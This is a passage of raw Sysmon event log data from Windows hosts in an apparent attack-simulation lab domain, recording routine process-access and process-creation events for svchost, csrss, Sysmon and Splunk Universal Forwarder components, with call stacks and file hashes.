16:29:24.130{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245871Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.130{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245870Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.130{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245869Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.130{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245868Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.130{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245867Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.130{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245866Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.130{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245865Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.130{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245864Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.130{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245863Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.130{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-51E4-6063-B622-00000000AF01}2492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245862Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.130{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-51E4-6063-B622-00000000AF01}2492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245861Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.131{CB4067E1-51E4-6063-B622-00000000AF01}2492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001061139Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.935{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-51E5-6063-2601-00000000AF01}5832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061138Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.935{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061137Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.935{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061136Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.935{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061135Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.935{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061134Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.935{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-51E5-6063-2601-00000000AF01}5832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061133Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.935{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-51E5-6063-2601-00000000AF01}5832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061132Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.937{7F8C56E7-51E5-6063-2601-00000000AF01}5832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001061131Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.388{7F8C56E7-51E5-6063-2501-00000000AF01}5000684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061130Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.247{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E78927722929B540D36F320F86F259F,SHA256=B3342F5839457CBB23219FFA1A169A2664C900782F603A729EEF50B784936915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061129Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.247{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-51E5-6063-2501-00000000AF01}5000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061128Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.247{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061127Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.247{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061126Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.247{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061125Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.247{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061124Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:25.247{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-51E5-6063-2501-00000000AF01}5000C:\Program 